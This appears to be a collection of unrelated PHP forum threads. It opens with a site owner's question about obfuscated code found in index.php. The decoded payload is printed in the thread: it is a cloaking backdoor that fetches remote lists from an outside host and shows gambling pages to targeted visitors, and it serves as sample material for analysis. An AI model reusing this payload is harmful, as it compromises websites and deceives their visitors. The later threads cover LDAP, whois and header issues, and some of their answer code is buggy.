Hello, I found that my site had this code in index.php.
Can anyone translate this code, please?
eval(base64_decode('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'));
Edit:
The output of the base64 seems fishy. Someone tried to inject obfuscated code through the eval() function.
Decoded base64 output:
goto EuIN9; YSSOD: $cek = file_get_contents("\x68\x74\164\160\x73\72\x2f\57\152\x73\x6f\156\x2e\147\x65\157\151\x70\x6c\x6f\x6f\153\165\x70\x2e\151\157\x2f" . $ip); goto gTr3W; gXUTK: date_default_timezone_set("\x41\163\151\141\x2f\x42\141\156\x67\153\157\153"); goto IHNBX; XiYvO: if ($cloacking != "\117\x4e") { include $nonjudi; die; } else { if (in_array($countrycode, $negara) && ismobile($onlymobile) && gclid($onlygclid)) { include $judi; } else { if (in_array($ip, $banip)) { include $nonjudi; } else { if (in_array($ip, $wlip)) { include $judi; } else { if (strpos(strtolower($http_user_agent), google) !== false || strpos(strtolower($http_user_agent), bot) !== false || strpos(strtolower($host), google) !== false) { include $nonjudi; } else { include $nonjudi; } } } } } goto ZoMJj; SV4DE: $referer = isset($_SERVER["\x48\124\124\120\x5f\122\x45\x46\x45\x52\x45\x52"]) ? $_SERVER["\x48\x54\x54\120\137\x52\x45\x46\105\122\x45\x52"] : ''; goto g69de; dtPIm: if (!isset($ip)) { $ip = $_SERVER["\122\x45\x4d\117\x54\x45\137\x41\x44\104\x52"]; } goto RSiEb; KqEPl: $web_page = $_SERVER["\x53\x43\122\111\120\124\x5f\x4e\101\115\105"]; goto BECJH; g69de: $http_user_agent = isset($_SERVER["\110\x54\x54\x50\137\125\123\x45\122\x5f\x41\x47\x45\x4e\124"]) ? $_SERVER["\110\x54\124\x50\137\x55\x53\x45\122\137\101\x47\105\116\124"] : "\156\157\x20\125\x73\145\162\55\x61\x67\145\x6e\164"; goto KqEPl; RSiEb: $pl = file_get_contents("\x68\164\164\160\x73\x3a\57\57\154\x6f\153\x6c\x69\141\x75\x2e\x63\x6f\x6d\x2f\x63\x6c\x6f\x61\153\55\x61\x70\151\x2f" . 
$PTCode); goto CAcoh; IHNBX: $ip = $_SERVER["\110\124\x54\120\x5f\103\x46\x5f\103\117\116\116\x45\103\x54\111\x4e\x47\137\x49\x50"]; goto dtPIm; LpqWM: $host = $isp; goto XiYvO; EuIN9: include "\163\x65\x74\165\x70\56\160\150\160"; goto gXUTK; Ajf18: function gclid($g) { if ($g == "\131\101") { if (isset($_GET["\x67\x63\154\151\x64"]) && !empty($_GET["\147\143\x6c\x69\x64"]) && strlen($_GET["\147\143\154\151\x64"]) > 32) { return true; } else { return false; } } else { return true; } } goto YSSOD; BECJH: $domain = $_SERVER["\x53\105\x52\126\105\x52\137\x4e\x41\115\x45"]; goto LpqWM; CAcoh: $o = json_decode($pl); goto hQLc8; uh5h_: if (!in_array($_SERVER["\x48\x54\x54\x50\x5f\110\x4f\123\124"], $list)) { header("\x4c\157\x63\x61\x74\151\x6f\156\72\40" . $fbl[0]); die; } goto bINpt; gTr3W: $status = json_decode($cek)->success; goto t80Uu; hQLc8: $list = $o->list; goto BVHYz; bINpt: function ismobile($m) { if ($m == "\x59\x41") { return preg_match("\57\x28\x61\156\144\x72\157\x69\144\x7c\141\x76\x61\156\x74\147\157\x7c\142\x6c\x61\143\x6b\142\145\x72\x72\x79\174\x62\x6f\154\164\x7c\x62\x6f\157\x73\164\174\x63\x72\x69\143\153\145\164\174\144\x6f\143\x6f\x6d\157\x7c\146\157\156\145\x7c\150\x69\160\x74\x6f\x70\174\x6d\x69\156\x69\174\155\x6f\x62\151\x7c\x70\x61\154\x6d\x7c\x70\150\x6f\156\145\174\160\151\145\x7c\x74\x61\142\x6c\145\x74\x7c\165\x70\134\56\142\162\157\167\163\x65\x72\x7c\165\160\x5c\x2e\154\x69\x6e\153\x7c\x77\145\x62\x6f\x73\x7c\167\157\163\51\57\151", $_SERVER["\x48\x54\x54\120\x5f\125\123\x45\122\x5f\x41\107\105\116\x54"]); } else { return true; } } goto Ajf18; BVHYz: $fbl = $o->link; goto uh5h_; t80Uu: if ($status != true) { $ipapi = file_get_contents("\150\x74\x74\160\x3a\57\x2f\151\x70\55\x61\x70\x69\x2e\x63\x6f\155\x2f\152\163\157\156\x2f" . 
$ip); $country = json_decode($ipapi)->country; $countrycode = json_decode($ipapi)->countryCode; $city = json_decode($ipapi)->city; $org = json_decode($cek)->org; $isp = json_decode($cek)->isp; } else { $country = json_decode($cek)->country_name; $countrycode = json_decode($cek)->country_code; $city = json_decode($cek)->city; $org = json_decode($cek)->asn_org; $isp = json_decode($cek)->isp; } goto SV4DE; ZoMJj:
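A way to read a payload like the one above without executing it, given here as an added example that is not part of the original post: it follows the goto chain to restore execution order and decodes the `\x` and octal string escapes. `SAMPLE` is a constructed snippet in the same style with a placeholder host, and the goto handling assumes every block ends in one unconditional `goto`, as in the dump above.

```python
import re

# One escape inside a PHP double-quoted string: \xHH, \NNN (octal) or backslash + one char.
_ESCAPE = re.compile(r'\\(x[0-9A-Fa-f]{1,2}|[0-7]{1,3}|.)', re.S)
_SIMPLE = {'n': '\n', 't': '\t', 'r': '\r', '\\': '\\', '"': '"', '$': '$'}
_DQ_STRING = re.compile(r'"((?:[^"\\]|\\.)*)"', re.S)
# A goto label opens a statement: NAME: at the start of the file or after ';' or '}'.
_LABEL = re.compile(r'(?:^|(?<=[;}]))\s*([A-Za-z_]\w*):(?!:)')
_TRAILING_GOTO = re.compile(r'\bgoto\s+([A-Za-z_]\w*)\s*;\s*$')

# Constructed sample in the style of the decoded payload (placeholder host, made-up labels).
SAMPLE = (
    r'goto s1; '
    r's3: $body = file_get_contents("\x68\x74\164\160\x73\72\x2f\57\145\x78\141\x6d'
    r'\160\154\x65\56\x69\156\166\x61\154\x69\144\57" . $ip); goto s4; '
    r's1: include "\163\x65\x74\165\x70\56\160\150\160"; goto s2; '
    r's2: $ip = $_SERVER["\122\x45\x4d\117\x54\x45\137\x41\x44\104\x52"]; goto s3; '
    r's4:'
)


def decode_escapes(body):
    """Decode the escapes of one double-quoted PHP string body."""
    def one(match):
        tok = match.group(1)
        if tok[0] == 'x' and len(tok) > 1:
            return chr(int(tok[1:], 16))
        if tok[0] in '01234567':
            return chr(int(tok, 8) & 0xFF)   # PHP keeps only the low byte
        return _SIMPLE.get(tok, '\\' + tok)  # unknown escapes stay literal
    return _ESCAPE.sub(one, body)


def linearise(src):
    """Return the labelled blocks in the order the goto chain executes them."""
    labels = list(_LABEL.finditer(src))
    if not labels:
        return [src.strip()]
    blocks = {}
    for i, m in enumerate(labels):
        end = labels[i + 1].start() if i + 1 < len(labels) else len(src)
        blocks[m.group(1)] = src[m.end():end].strip()
    entry = _TRAILING_GOTO.search(src[:labels[0].start()].strip())
    current = entry.group(1) if entry else labels[0].group(1)
    ordered, seen = [], set()
    while current in blocks and current not in seen:  # 'seen' stops goto loops
        seen.add(current)
        body = blocks[current]
        jump = _TRAILING_GOTO.search(body)
        if jump is None:
            ordered.append(body)
            break
        ordered.append(body[:jump.start()].strip())
        current = jump.group(1)
    return [b for b in ordered if b]


def deobfuscate(src):
    """Readable statements (for reading only): execution order, strings decoded."""
    def show(m):
        return '"' + decode_escapes(m.group(1)) + '"'
    return [_DQ_STRING.sub(show, block) for block in linearise(src)]


def url_indicators(src):
    """Decoded string literals that are URLs, for blocklists or log searches."""
    decoded = {decode_escapes(m.group(1)) for m in _DQ_STRING.finditer(src)}
    return sorted(s for s in decoded if re.match(r'https?://', s))


if __name__ == '__main__':
    print('\n'.join(deobfuscate(SAMPLE)))
    print(url_indicators(SAMPLE))
```

Feed it the decoded text saved to a file; the script only does string processing and never evaluates the PHP.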
I'm trying to connect to Active Directory and validate my user, which works, and then I retrieve a certain field which returns an employee code that is stored in AD for our payroll/ESS application. This code has been working on multiple different clients, but suddenly at one client the code runs through until it gets to ldap_get_entries; the ldap_search ran successfully but nothing is getting returned in get_entries.
I've checked some similar problems where people changed sAMAccount to uid or email in the filter, but that hasn't helped me solve this. Does anyone maybe have an idea what I missed that would make this code fail on one system but work fine on others?
The magic happens in the second function (RetrieveADEntry); the first (Authenticate) is just to show my connection.
public function authenticate()
{
error_reporting(0);
//10.0.4.22
$this->ldapConnection = ldap_connect($this->mHost, $this->mPort);
if(isset($this->ldapConnection))
{
if(trim($this->mUsername) === "")
{
$this->mErrorCode = ERR_USERNAME_REQUIRED;
$this->mConnected = false;
return false;
}
else if(trim($this->mPassword) === "")
{
$this->mErrorCode = ERR_PASSWORD_REQUIRED;
$this->mConnected = false;
return false;
}
echo "pre bind";
ldap_set_option($this->ldapConnection, LDAP_OPT_PROTOCOL_VERSION, 3);
ldap_set_option($ldap, LDAP_OPT_REFERRALS, 0);
if ($this->mGroup == null)
{
$ldaprdn = $this->mPrdn . "\\" . $this->mUsername;
}
else
{
$ldaprdn = 'cn='.$this->mGroup.$this->mPrdn . "\\" . $this->mUsername;
}
$mConnected = ldap_bind($this->ldapConnection, $ldaprdn, $this->mPassword);
if ($mConnected)
{
$this->retrieveADEntry();
echo "Binded";
if ($this->mErrorCode == UNAUTHORIZED)
{
$this->mErrorCode = UNAUTHORIZED;
$this->mConnected = false;
}
else if ($this->mErrorCode == ERR_LOGIN_FAILED)
{
$this->mErrorCode = ERR_LOGIN_FAILED;
$this->mConnected = false;
}
else
{
$this->mErrorCode = SUCCESSFUL;
$this->mConnected = true;
if ($data->{"rlogcompanycode"} != ''){
$this->setCompanyCode(trim((string)$data->{"rlogcompanycode"}));
}
}
}
else
{
echo "Not binded";
$this->mErrorCode = ERR_LOGIN_FAILED;
$this->mConnected = false;
}
return $this->mConnected;
}
else{
$this->mErrorCode = ERR_CONNECTION_FAILED;
$this->mConnected = false;
return false;
}
error_reporting(E_ALL);
}
private function retrieveADEntry()
{
//$ldap_base_dn = 'DC='.$this->mDC.',DC='.$this->mDomain;
$ldap_base_dn = "OU=group,DC=domain,DC=co,DC=za";
$filter = "";
$attr = array(
$this->mField,
"sAMAccountName",
);
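// Escape the user-supplied name so it cannot change the structure of the LDAP filter
$filter .= "(sAMAccountName=" . ldap_escape($this->mUsername, "", LDAP_ESCAPE_FILTER) . ")";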
$search_results = ldap_search($this->ldapConnection,$ldap_base_dn, $filter);
//For each account returned by the search
if (FALSE !== $search_results ){
$entries = ldap_get_entries($this->ldapConnection, $search_results);
$values = ldap_get_values($this->ldapConnection,$search_results, $attr);
$access = 0;
//For each account returned by the search
echo "succesfull query";
echo $entries['count'];
echo $this->mUsername;
var_dump($values);
for ($x=0; $x<$entries['count']; $x++)
{
echo "in loop";
var_dump($entries);
if (strpos( $entries[$x]['memberof'][0], $this->mGroup)) //Check if member is part of specified group
{
echo "GroupCheck1";
$access = 1;
$group = $this->mGroup;
}
if ($this->mGroup == null)
{
echo "GroupCheck2";
$access = 1;
}
echo "PostGroupChecks";
echo $access;
if ($access != 0)
{
echo "access";
echo $this->mField;
echo $entries[$x]['sAMAccountName'][0];
if (!empty($entries[$x][$this->mField][0]))
{
$this->setEmpkey($entries[$x][$this->mField][0]);
echo $entries[$x][$this->mField][0];
}
echo "return succesfull";
$this->mConnected = true;
$this->mErrorCode = SUCCESSFUL;
}
else
{
echo "No Access";
$this->mConnected = false;
$this->mErrorCode = UNAUTHORIZED;
} //END for loop
}
//END FALSE !== $result
ldap_unbind($ldap_connection); // Clean up after ourselves.
}
else
{
$this->mConnected = false;
$this->mErrorCode = ERR_LOGIN_FAILED;
}
return $this->ldapEntry;
}
PS. I also wrote a C# script for our desktop app which works perfectly fine on this system just like on all the rest and doesn't give this issue
I am using this whois class, it works fine on one server but it does not work properly on another server with the same PHP version 5.4, on first server it returns domain name status correctly, but on the other one it returns just one status: "domain name is not available" while the domain name is actually available.
<?
class Whois_domain {
var $possible_tlds;
var $whois_server;
var $free_string;
var $whois_param;
var $domain;
var $tld;
var $compl_domain;
var $full_info;
var $msg;
var $info;
var $os_system = "linux"; // switch between "linux" and "win"
function Whois_domain() {
$this->info = "";
$this->msg = "";
}
function process() {
if ($this->create_domain()) {
if ($this->full_info == "yes") {
$this->get_domain_info();
} else {
if ($this->check_only() == 1) {
$this->msg = "The domain name: <b>".$this->compl_domain."</b> is free.";
return true;
} elseif ($this->check_only() == 0) {
$this->msg = "The domain name: <b>".$this->compl_domain."</b> is not available";
return false;
} else {
$this->msg = "There was something wrong, try it again.";
}
}
} else {
$this->msg = "Only letters, numbers and hyphens (-) are valid!";
}
}
function check_entry() {
if (preg_match("/^([a-z0-9]+(\-?[a-z0-9]*)){2,63}$/i", $this->domain)) {
return true;
} else {
return false;
}
}
function create_tld_select() {
$menu = "<select name=\"tld\" style=\"margin-left:0;\">\n";
foreach ($this->possible_tlds as $val) {
$menu .= " <option value=\"".$val."\"";
$menu .= (isset($_POST['tld']) && $_POST['tld'] == $val) ? " selected=\"selected\">" : ">";
$menu .= $val."</option>\n";
}
$menu .= "</select>\n";
return $menu;
}
function create_domain() {
if ($this->check_entry()) {
$this->domain = strtolower($this->domain);
$this->compl_domain = $this->domain.".".$this->tld;
return true;
} else {
return false;
}
}
function check_only() {
$data = $this->get_whois_data();
if (is_array($data)) {
$found = 0;
foreach ($data as $val) {
if (eregi($this->free_string, $val)) {
$found = 1;
}
}
return $found;
} else {
$this->msg = "Error, please try it again.";
}
}
function get_domain_info() {
if ($this->create_domain()) {
$data = ($this->tld == "nl") ? $this->get_whois_data(true) : $this->get_whois_data();
if (is_array($data)) {
foreach ($data as $val) {
if (eregi($this->free_string, $val)) {
$this->msg = "The domain name: <b>".$this->compl_domain."</b> is free.";
$this->info = "";
break;
}
$this->info .= $val;
}
} else {
$this->msg = "Error, please try it again.";
}
} else {
$this->msg = "Only letters, numbers and hyphens (-) are valid!";
}
}
function get_whois_data($empty_param = false) {
// the parameter is new since version 1.20 and is used for .nl (dutch) domains only
if ($empty_param) {
$this->whois_param = "";
}
if ($this->tld == "de") $this->os_system = "win"; // this tld must be queried with fsock otherwise it will not work
if ($this->os_system == "win") {
$connection = @fsockopen($this->whois_server, 43);
if (!$connection) {
unset($connection);
$this->msg = "Can't connect to the server!";
return;
} else {
sleep(2);
fputs($connection, $this->whois_param.$this->compl_domain."\r\n");
while (!feof($connection)) {
$buffer[] = fgets($connection, 4096);
}
fclose($connection);
}
} else {
// Quote every argument for the shell so the server, parameter and domain cannot inject commands
$string = "whois -h ".escapeshellarg($this->whois_server)." ".escapeshellarg($this->whois_param.$this->compl_domain);
exec($string, $buffer);
}
if (isset($buffer)) {
//print_r($buffer);
return $buffer;
} else {
$this->msg = "Can't retrieve data from the server!";
}
}
}
?>
I changed files permissions and php versions on the other server, but still the same.
This has been solved, it was fsockopen restrictions on the server, it is fine now.
Does anyone see how headers could be sent in this script? I am using this script to validate a form. As a result it is causing headers to be sent so when I try to direct a user after implementing this script it causes the normal "Warning: Cannot modify header information - headers already sent" message. Here is the script:
<?php
class ValidatorObj
{
var $variable_name;
var $validator_string;
var $error_string;
}
/**
* Base class for custom validation objects
**/
class CustomValidator
{
function DoValidate(&$formars,&$error_hash)
{
return true;
}
}
/** Default error messages*/
define("E_VAL_REQUIRED_VALUE","Please enter the value for %s");
define("E_VAL_MAXLEN_EXCEEDED","Maximum length exceeded for %s.");
define("E_VAL_MINLEN_CHECK_FAILED","Please enter input with length more than %d for %s");
define("E_VAL_ALNUM_CHECK_FAILED","Please provide an alpha-numeric input for %s");
define("E_VAL_ALNUM_S_CHECK_FAILED","Please provide an alpha-numeric input for %s");
define("E_VAL_NUM_CHECK_FAILED","Please provide numeric input for %s");
define("E_VAL_ALPHA_CHECK_FAILED","Please provide alphabetic input for %s");
define("E_VAL_ALPHA_S_CHECK_FAILED","Please provide alphabetic input for %s");
define("E_VAL_EMAIL_CHECK_FAILED","Please provide a valid email address");
define("E_VAL_LESSTHAN_CHECK_FAILED","Enter a value less than %f for %s");
define("E_VAL_GREATERTHAN_CHECK_FAILED","Enter a value greater than %f for %s");
define("E_VAL_REGEXP_CHECK_FAILED","Please provide a valid input for %s");
define("E_VAL_DONTSEL_CHECK_FAILED","Wrong option selected for %s");
define("E_VAL_SELMIN_CHECK_FAILED","Please select minimum %d options for %s");
define("E_VAL_SELONE_CHECK_FAILED","Please select an option for %s");
define("E_VAL_EQELMNT_CHECK_FAILED","Value of %s should be same as that of %s");
define("E_VAL_NEELMNT_CHECK_FAILED","Value of %s should not be same as that of %s");
class FormValidator
{
var $validator_array;
var $error_hash;
var $custom_validators;
function FormValidator()
{
$this->validator_array = array();
$this->error_hash = array();
$this->custom_validators=array();
}
function AddCustomValidator(&$customv)
{
array_push($this->custom_validators,$customv);
}
function addValidation($variable,$validator,$error)
{
$validator_obj = new ValidatorObj();
$validator_obj->variable_name = $variable;
$validator_obj->validator_string = $validator;
$validator_obj->error_string = $error;
array_push($this->validator_array,$validator_obj);
}
function GetErrors()
{
return $this->error_hash;
}
function ValidateForm()
{
$bret = true;
$error_string="";
$error_to_display = "";
if(strcmp($_SERVER['REQUEST_METHOD'],'POST')==0)
{
$form_variables = $_POST;
}
else
{
$form_variables = $_GET;
}
$vcount = count($this->validator_array);
foreach($this->validator_array as $val_obj)
{
if(!$this->ValidateObject($val_obj,$form_variables,$error_string))
{
$bret = false;
$this->error_hash[$val_obj->variable_name] = $error_string;
}
}
if(true == $bret && count($this->custom_validators) > 0)
{
foreach( $this->custom_validators as $custom_val)
{
if(false == $custom_val->DoValidate($form_variables,$this->error_hash))
{
$bret = false;
}
}
}
return $bret;
}
function ValidateObject($validatorobj,$formvariables,&$error_string)
{
$bret = true;
$splitted = explode("=",$validatorobj->validator_string);
$command = $splitted[0];
$command_value = '';
if(isset($splitted[1]) && strlen($splitted[1])>0)
{
$command_value = $splitted[1];
}
$default_error_message="";
$input_value ="";
if(isset($formvariables[$validatorobj->variable_name]))
{
$input_value = $formvariables[$validatorobj->variable_name];
}
$bret = $this->ValidateCommand($command,$command_value,$input_value,
$default_error_message,
$validatorobj->variable_name,
$formvariables);
if(false == $bret)
{
if(isset($validatorobj->error_string) &&
strlen($validatorobj->error_string)>0)
{
$error_string = $validatorobj->error_string;
}
else
{
$error_string = $default_error_message;
}
}//if
return $bret;
}
function validate_req($input_value, &$default_error_message,$variable_name)
{
$bret = true;
if(!isset($input_value) ||
strlen($input_value) <=0)
{
$bret=false;
$default_error_message = sprintf(E_VAL_REQUIRED_VALUE,$variable_name);
}
return $bret;
}
function validate_maxlen($input_value,$max_len,$variable_name,&$default_error_message)
{
$bret = true;
if(isset($input_value) )
{
$input_length = strlen($input_value);
if($input_length > $max_len)
{
$bret=false;
$default_error_message = sprintf(E_VAL_MAXLEN_EXCEEDED,$variable_name);
}
}
return $bret;
}
function validate_minlen($input_value,$min_len,$variable_name,&$default_error_message)
{
$bret = true;
if(isset($input_value) )
{
$input_length = strlen($input_value);
if($input_length < $min_len)
{
$bret=false;
$default_error_message = sprintf(E_VAL_MINLEN_CHECK_FAILED,$min_len,$variable_name);
}
}
return $bret;
}
function test_datatype($input_value,$reg_exp)
{
if(ereg($reg_exp,$input_value))
{
return false;
}
return true;
}
function validate_email($email)
{
return eregi("^[_\.0-9a-zA-Z-]+@([0-9a-zA-Z][0-9a-zA-Z-]+\.)+[a-zA-Z]{2,6}$", $email);
}
function validate_for_numeric_input($input_value,&$validation_success)
{
$more_validations=true;
$validation_success = true;
if(strlen($input_value)>0)
{
if(false == is_numeric($input_value))
{
$validation_success = false;
$more_validations=false;
}
}
else
{
$more_validations=false;
}
return $more_validations;
}
function validate_lessthan($command_value,$input_value,
$variable_name,&$default_error_message)
{
$bret = true;
if(false == $this->validate_for_numeric_input($input_value,
$bret))
{
return $bret;
}
if($bret)
{
$lessthan = doubleval($command_value);
$float_inputval = doubleval($input_value);
if($float_inputval >= $lessthan)
{
$default_error_message = sprintf(E_VAL_LESSTHAN_CHECK_FAILED,
$lessthan,
$variable_name);
$bret = false;
}//if
}
return $bret ;
}
function validate_greaterthan($command_value,$input_value,$variable_name,&$default_error_message)
{
$bret = true;
if(false == $this->validate_for_numeric_input($input_value,$bret))
{
return $bret;
}
if($bret)
{
$greaterthan = doubleval($command_value);
$float_inputval = doubleval($input_value);
if($float_inputval <= $greaterthan)
{
$default_error_message = sprintf(E_VAL_GREATERTHAN_CHECK_FAILED,
$greaterthan,
$variable_name);
$bret = false;
}//if
}
return $bret ;
}
function validate_select($input_value,$command_value,&$default_error_message,$variable_name)
{
$bret=false;
if(is_array($input_value))
{
foreach($input_value as $value)
{
if($value == $command_value)
{
$bret=true;
break;
}
}
}
else
{
if($command_value == $input_value)
{
$bret=true;
}
}
if(false == $bret)
{
$default_error_message = sprintf(E_VAL_SHOULD_SEL_CHECK_FAILED,
$command_value,$variable_name);
}
return $bret;
}
function validate_dontselect($input_value,$command_value,&$default_error_message,$variable_name)
{
$bret=true;
if(is_array($input_value))
{
foreach($input_value as $value)
{
if($value == $command_value)
{
$bret=false;
$default_error_message = sprintf(E_VAL_DONTSEL_CHECK_FAILED,$variable_name);
break;
}
}
}
else
{
if($command_value == $input_value)
{
$bret=false;
$default_error_message = sprintf(E_VAL_DONTSEL_CHECK_FAILED,$variable_name);
}
}
return $bret;
}
function ValidateCommand($command,$command_value,$input_value,&$default_error_message,$variable_name,$formvariables)
{
$bret=true;
switch($command)
{
case 'req':
{
$bret = $this->validate_req($input_value, $default_error_message,$variable_name);
break;
}
case 'maxlen':
{
$max_len = intval($command_value);
$bret = $this->validate_maxlen($input_value,$max_len,$variable_name,
$default_error_message);
break;
}
case 'minlen':
{
$min_len = intval($command_value);
$bret = $this->validate_minlen($input_value,$min_len,$variable_name,
$default_error_message);
break;
}
case 'alnum':
{
$bret= $this->test_datatype($input_value,"[^A-Za-z0-9]");
if(false == $bret)
{
$default_error_message = sprintf(E_VAL_ALNUM_CHECK_FAILED,$variable_name);
}
break;
}
case 'alnum_s':
{
$bret= $this->test_datatype($input_value,"[^A-Za-z0-9 ]");
if(false == $bret)
{
$default_error_message = sprintf(E_VAL_ALNUM_S_CHECK_FAILED,$variable_name);
}
break;
}
case 'num':
case 'numeric':
{
$bret= $this->test_datatype($input_value,"[^0-9]");
if(false == $bret)
{
$default_error_message = sprintf(E_VAL_NUM_CHECK_FAILED,$variable_name);
}
break;
}
case 'alpha':
{
$bret= $this->test_datatype($input_value,"[^A-Za-z]");
if(false == $bret)
{
$default_error_message = sprintf(E_VAL_ALPHA_CHECK_FAILED,$variable_name);
}
break;
}
case 'alpha_s':
{
$bret= $this->test_datatype($input_value,"[^A-Za-z ]");
if(false == $bret)
{
$default_error_message = sprintf(E_VAL_ALPHA_S_CHECK_FAILED,$variable_name);
}
break;
}
case 'email':
{
if(isset($input_value) && strlen($input_value)>0)
{
$bret= $this->validate_email($input_value);
if(false == $bret)
{
$default_error_message = E_VAL_EMAIL_CHECK_FAILED;
}
}
break;
}
case "lt":
case "lessthan":
{
$bret = $this->validate_lessthan($command_value,
$input_value,
$variable_name,
$default_error_message);
break;
}
case "gt":
case "greaterthan":
{
$bret = $this->validate_greaterthan($command_value,
$input_value,
$variable_name,
$default_error_message);
break;
}
case "regexp":
{
if(isset($input_value) && strlen($input_value)>0)
{
if(!preg_match("$command_value",$input_value))
{
$bret=false;
$default_error_message = sprintf(E_VAL_REGEXP_CHECK_FAILED,$variable_name);
}
}
break;
}
case "dontselect":
case "dontselectchk":
case "dontselectradio":
{
$bret = $this->validate_dontselect($input_value,
$command_value,
$default_error_message,
$variable_name);
break;
}//case
case "shouldselchk":
case "selectradio":
{
$bret = $this->validate_select($input_value,
$command_value,
$default_error_message,
$variable_name);
break;
}//case
case "selmin":
{
$min_count = intval($command_value);
if(isset($input_value))
{
if($min_count > 1)
{
$bret = (count($input_value) >= $min_count )?true:false;
}
else
{
$bret = true;
}
}
else
{
$bret= false;
$default_error_message = sprintf(E_VAL_SELMIN_CHECK_FAILED,$min_count,$variable_name);
}
break;
}//case
case "selone":
{
if(false == isset($input_value)||
strlen($input_value)<=0)
{
$bret= false;
$default_error_message = sprintf(E_VAL_SELONE_CHECK_FAILED,$variable_name);
}
break;
}
case "eqelmnt":
{
if(isset($formvariables[$command_value]) &&
strcmp($input_value,$formvariables[$command_value])==0 )
{
$bret=true;
}
else
{
$bret= false;
$default_error_message = sprintf(E_VAL_EQELMNT_CHECK_FAILED,$variable_name,$command_value);
}
break;
}
case "neelmnt":
{
if(isset($formvariables[$command_value]) &&
strcmp($input_value,$formvariables[$command_value]) !=0 )
{
$bret=true;
}
else
{
$bret= false;
$default_error_message = sprintf(E_VAL_NEELMNT_CHECK_FAILED,$variable_name,$command_value);
}
break;
}
}//switch
return $bret;
}//validdate command
}?>
After the }?>
If you select all (Ctrl+A) you will see the white space proceeding the ?>
There is likely whitespace after the closing ?> tag. It's become quite common practice to leave off the ending ?> tag to prevent this exact issue. But that can only be done in files that contain only code in classes, no procedural code.
To add on to RobertPitt, if your file is solely PHP only, add the <?php at the start, and remove the ?> to prevent careless whitespaces at the back.
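A check for the condition these answers describe, as an added example that is not from the original posts: it reports bytes a PHP include file would emit outside its PHP block. It goes slightly beyond the answers by also covering a BOM or text before the opening tag, and it assumes `?>` does not occur inside a string or comment; the file contents in `CASES` are constructed.

```python
import re

BOM = b'\xef\xbb\xbf'


def early_output(source):
    """List the places where a PHP include file emits bytes outside PHP mode."""
    findings = []
    if source.startswith(BOM):
        findings.append('UTF-8 BOM before the opening tag')
        source = source[len(BOM):]
    first_open = source.find(b'<?')
    if first_open == -1:
        findings.append('no opening tag: the whole file is sent as output')
        return findings
    if first_open > 0:
        findings.append('%d byte(s) before the opening tag' % first_open)
    last_open = source.rfind(b'<?')
    last_close = source.rfind(b'?>')
    if last_close > last_open:  # the file ends outside PHP mode
        tail = source[last_close + 2:]
        # PHP itself swallows ONE newline directly after "?>"; anything else is output.
        tail = re.sub(rb'\A(?:\r\n|\n|\r)', b'', tail)
        if tail:
            findings.append('%d byte(s) after the closing ?>: %r' % (len(tail), tail))
    return findings


# Constructed inputs: the same class file with different endings.
CASES = {
    'closing tag + one newline': b"<?php\nclass FormValidator {}\n?>\n",
    'closing tag + space':       b"<?php\nclass FormValidator {}\n?> \n",
    'closing tag + blank line':  b"<?php\nclass FormValidator {}\n?>\n\n",
    'no closing tag':            b"<?php\nclass FormValidator {}\n\n\n",
    'BOM from the editor':       BOM + b"<?php\nclass FormValidator {}\n",
}

if __name__ == '__main__':
    for name, data in CASES.items():
        print('%-26s %s' % (name, early_output(data) or 'clean'))
```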
I have a page that includes/embeds a file that contains a number of functions.
One of the functions has a variable I want to pass back onto the page that the file is embedded on.
<?php
include('functions.php');
userInGroup();
if($user_in_group) {
    print 'user is in group';
} else {
    print 'user is not in group';
}
?>
function within functions.php
<?php
function userInGroup() {
    foreach($group_access as $i => $group) {
        if($group_session == $group) {
            $user_in_group = TRUE;
            break;
        } else {
            $user_in_group = FALSE;
        }
    }
}?>
I am unsure as to how I can pass the value from the function userInGroup back to the page it runs the conditional if($user_in_group) on
Any help is appreciated.
Update:
I am calling userInGroup(array("STAFF","STUDENTS","FACULTY"));
which then is
<?php
function userInGroup($group_access) {
    session_start();
    if(isset($_SESSION['user_session'])) {
        $username = $_SESSION['user_session'];
        $group_session = $_SESSION['group_session'];
        $user_full_name = $_SESSION['user_full_name'];
        foreach($group_access as $i => $group) {
            if($group_session == $group) {
                $user_in_group = TRUE;
                break;
            } else {
                $user_in_group = FALSE;
            }
        }
        return $user_in_group;
    } else {
        print 'not logged in';
    }
}
?>
Easiest way:
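$user_in_group = userInGroup();
function userInGroup() {
    // $group_access and $group_session must be in scope here (e.g. passed in as parameters)
    foreach($group_access as $i => $group) {
        if($group_session == $group) {
            $user_in_group = TRUE;
            break;
        } else {
            $user_in_group = FALSE; // assignment, not comparison
        }
    }
    return $user_in_group;
}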
Use the return statement.
You can use your original function with one minor modification:
<?php
function userInGroup() {
    global $user_in_group; // the one added line
    foreach($group_access as $i => $group) {
        if($group_session == $group) {
            $user_in_group = TRUE;
            break;
        } else {
            $user_in_group = FALSE;
        }
    }
}?>